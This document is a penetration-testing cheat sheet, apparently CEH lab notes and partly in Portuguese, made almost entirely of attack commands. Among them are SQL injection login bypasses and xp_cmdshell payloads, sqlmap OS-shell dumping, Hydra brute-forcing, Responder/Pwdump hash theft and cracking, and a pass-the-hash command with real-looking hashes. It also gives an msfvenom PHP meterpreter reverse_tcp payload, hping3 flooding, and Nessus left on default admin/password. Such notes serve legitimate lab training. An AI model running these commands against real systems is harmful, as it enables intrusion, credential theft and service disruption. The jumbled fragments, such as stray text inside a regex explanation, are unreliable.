pentest-tricks

Enumeration

• ping URL –f –l 1500 -> Frame size
• tracert URL -> Determining hop count

Using Metasploit

• msfdb init
• service postgresql start
• msfconsole
• msf > db_status
• nmap -Pn -sS -A -oX Test 10.10.10.0/24
• db_import Test
• hosts -> To show all available hosts in the subnet
• db_nmap -sS -A 10.10.10.16 -> To extract services of particular machine
• services -> to get all available services in a subnet

SMB Version Enumeration using MSF

• use scanner/smb/smb_version
• set RHOSTS 10.x.x.x-X
• set THREADS 100
• run
• hosts -> now exact os_flavor information has been updated

SMB Commands

• nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse MACHINE_IP
• smbclient ///anonymous
• smbget -R smb:///anonymous

Scanning Networks

• Hping3

  1. Port ****Scanning using Hping3: hping3 --scan 1-3000 -S 10.10.10.10 --scan parameter defines the port range to scan and –S represents SYN flag.

  2. Pinging the target using HPing3: hping3 -c 3 10.10.10.10 -c 3 means that we only want to send three packets to the target machine.

  3. UDP Packet Crafting hping3 10.10.10.10 --udp --rand-source --data 500

  4. TCP SYN request hping3 -S 10.10.10.10 -p 80 -c 5
     -S will perform TCP SYN request on the target machine, -p will pass the traffic through whichport is assigned, and -c is the count of the packets sent to the Target machine.

  5. HPing flood hping3 10.10.10.10 --flood

• Nmap

  • Scan a subnet - nmap 20.0.20.0/24
  • Scan targets from a text file        nmap -iL list-of-ips.tx
  • Scan a single Port                       nmap -p 22 20.0.20.1
  • Scan a range of ports                  nmap -p 1-100 20.0.20.1
  • Scan 100 most common ports (Fast)        nmap -F 20.0.20.1
  • Scan all 65535 ports                   nmap -p- 20.0.20.1
  • Scan using TCP connect           nmap -sT 20.0.20.1
  • Scan using TCP SYN scan (default)            nmap -sS 20.0.20.1
  • Scan UDP ports nmap -sU -p 123,161,162 20.0.20.1
  • Scan selected ports – ignore discovery     nmap -Pn -F 20.0.20.1
  • Detect OS and Services nmap -A 20.0.20.1
  • Standard service detection          nmap -sV 20.0.20.1
  • nmap -O
  • nmap –packet-trace
  • nmap -sT -T3 -A
  • nmap -sA -v -T4
  • nmap -sP , nmap -D RND
  • nmap -mtu 8
  • nmap -v -sS -T5  
  • nmap -sV -Pn  
  • nmap -sP
  • nmap -sA
  • nmap -sV -A -F
  • nmap -sS
  • nmap -p- –max-rtt-timeout 50ms, nmap -v -sS -f -T5

• Netdiscover

  • netdiscover -i eth0
  • netdiscover -i eth0 -r

Enumeration

SNMP Enumeration

• nmap –sU –p 161 192.168.0.X
• nmap -sU -p 161 --script=snmp-brute 192.168.0.X
• msfconsole
• use auxiliary/scanner/snmp/snmp_login
• set RHOSTS and exploit
• use auxiliary/scanner/snmp/snmp_enum
• set RHOSTS and exploit

NetBIOS Enumeration

• nbtstat –A 192.168.0.X
• net use
• net use \192.168.0.X\e ““\user:””
• net use \192.168.0.X\e ““/user:””
• NetBIOS Enumerator

Enum4Linux Wins Enumeration :

• enum4linux -u user -p password -U 10.x.x.x -> Users Enumeration
• enum4linux -u user -p password -o 10.x.x.x -> OS Enumeration
• enum4linux -u user -p password -P 10.x.x.x -> Password Policy Information
• enum4linux -u user -p password -G 10.x.x.x -> Groups Information
• enum4linux -u user -p password -S 10.x.x.x -> Share Policy Information (SMB Shares Enumeration

Active Directory LDAP Enumeration : ADExplorer

Vulnerability Analysis

• nikto -h http://target -Tuning 1

• Nessus runs on https://localhost:8834

  Username: admin
  Password: password
  

• Nessus -> Policies > Advanced scan

• Discovery > Host Discovery > Turn off Ping the remote host

• Port Scanning > check the Verify open TCP ports found by local port enumerators

• Advanced

  Max number of TCP sessions per host and = unlimited
  Max number of TCP sessions per scan = unlimited
  

• Credentials > Windows > Username & Password

• Save policy > Create new scan > User Defined

• Enter name & Target

• Schedule tab > Turn of Enabled

• Hit launch from drop-down of save.

Web Fuzzing

• wfuzz wfuzz -c -z file,common.txt --hc 404 http://site.com.br/FUZZ

• gobuster gobuster dir -u IP_ADDRESS -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html

System Hacking

NTLM Hash crack

• responder -I eth0
• usr\share\responder\logs --> Responder log location
• john /usr/share/responder/logs/ntlm.txt

Rainbow table crack using Winrtgen

• Open winrtgen and add new table
• Select ntlm from Hash dropdown list.
• Set Min Len as 4, Max Len as 6 and Chain Count 4000000
• Select loweralpha from Charset dropdown list (it depends upon Password).
• rcrack_gui.exe to crack hash with rainbow table

Hash dump with Pwdump7 and crack with ophcrack

• wmic useraccount get name,sid ****--> Get user acc names and SID
• PwDump7.exe > c:\hashes.txt
• Replace boxes in hashes.txt with relevant usernames from step 1.
• Ophcrack.exe -> load -> PWDUMP File
• Tables -> Vista free -> select the table directory -> crack

Sniffing

• Wireshark Filters

• Filter HTTP traffic by issuing http.request.method == “POST”, http.request.uri matches “pattern”

• Filter TCP traffic tcp.port eq 25 or icmp,  tcp.window_size == 0 && tcp.flags.reset != 1

• “ip.addr” matches against both the IP source and destination addresses in the IP header. The same is true for “tcp.port”, “udp.port”, “eth.addr”, and others http.request.method == “POST” -> Wireshark filter for filtering HTTP POST request

Show only traffic between source and destination

• ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
• ip.src==10.20.20.5 and ip.dst==201.22.7.102

Filter (Contains)

• http.request.uri matches "gl=se$" - OBS: The $ character is a PCRE punctuation charactPa$$w0rder that matches the end of a string.
• http.request.uri contains admin
• tcp contains admin
• udp contains 81:60:03
• sip.To contains "a1762"

Filter TTL - ip.ttl == 64

• TCPDump

• tcpdump -v -i eth0 -w nome.pcap

• tcpdump -v -i eth0 icmp -w icmp.pcap

Show only traffic between source and destination

• tcpdump -vnr file.pcap host 192.168.0.X
• tcpdump -vnr file.pcap src host 192.168.0.X
• tcpdump -vnr file.pcap dst host 192.168.0.X
• tcpdump -vnr file.pcap src host 192.168.0.1 and dst host 192.168.0.2

Filter Ports

• tcpdump -vnr file.pcap port 80

Show details protocol ethernet

• tcpdump -er file.pcap

Filter Protocol

• tcpdump -vnr file.pcap udp

Filter strings

• tcpdump -vnr file.pcap | grep “PASS”

== Flags TCPDump ==

[S] - SYN [S.] - SYN, ACK [.] - ACK [P.] -

Hacking Web Servers

• FTP Bruteforce with Hydra
  • hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://IP

Hacking Web Applications

Wordpress - wpscan --url http://IP --enumerate u

Wordpress password bruteforce

msfconsole - use auxiliary/scanner/http/wordpress_login_enum

RCE - ping 127.0.0.1 | hostname | net user

SQL Injection

• SQL queries
  • ’ or 1=1 —
• MySQL, MSSQL, Oracle, PostgreSQL, SQLite
  • ‘ OR ‘1’=’1′ —
  • ‘ OR ‘1’=’1′ /*
• MySQL
  • ‘ OR ‘1’=’1′ #
• Access (using null characters)
  • ‘ OR ‘1’=’1′ %00
  • ‘ OR ‘1’=’1′ %16

Using sqlmap

• Extract DBS
  • sqlmap -u http://www.example.com/viewprofile.aspx?id=1” -cookie="xookies xxx" --dbs
• Extract Tables
  • sqlmap -u “http://www.example.com/viewprofile.aspx?id=1” --cookie="cookies xxx" -D example --tables
• Extract Columns
  • sqlmap -u “http://www.example.com/viewprofile.aspx?id=1” --cookie="cookies xxx" -D example -T User_Login --columns
• Dump Data
  • sqlmap -u “http://www.example.com/viewprofile.aspx?id=1” --cookie="cookies xxx" -D example -T User_Login --dump
• OS Shell to execute commands
  • sqlmap -u “http://www.example.com/viewprofile.aspx?id=1” --cookie="cookies xxx" --os-shell

Others

• Login bypass
  • blah' or 1=1 --
• Insert data into DB from login
  • blah';insert into login values ('john','apple123');
• Create database from login
  • blah';create database mydatabase;
• Execute cmd from login
  • blah';exec master..xp_cmdshell 'ping www.target -l 65000 -t'; --

Brute Force

• Hydra

  • hydra -L ../.. /User.txt -P ../../../Pass.txt ftp://< target of evaluation >
  • hydra -L ../.. /User.txt -P ../../../Pass.txt ssh
  • hydra -l admin -P/usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form “/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout” -vV -f
  • hydra -l admin -P /usr/share/wordlists/test.txt 192.168.80.134 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login” -vV -f
  • hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://10.10.10.11

• hydra -l roger -P lists/pass.txt 192.168.56.117 -V http-form-post ¨/imfadministrator/:user=^USER^&pass=^PASS:F=Invalid username.¨

• John

• PassTheHash

pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.167.10 cmd

Criar login blah';insert into login values ('john','apple123'); --

.\SNOW.EXE -C -m "A conta do meu banco é 45656684512263" -p "magic" .\secrete_encrypt2.txt .\SNOW.EXE -C -p "magic" .\secrete_encrypt.txt snow -C -p "magic" readme2.txt

snow -C -m "My swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw

"dir flag* /s /p"

ntfs data stream criar um arquivo cehv11.txt com texto echo "novo texto" > cehv11.txt:stream1

recuperar more < cehv11.stream1

descobrir nfs data stream dir /r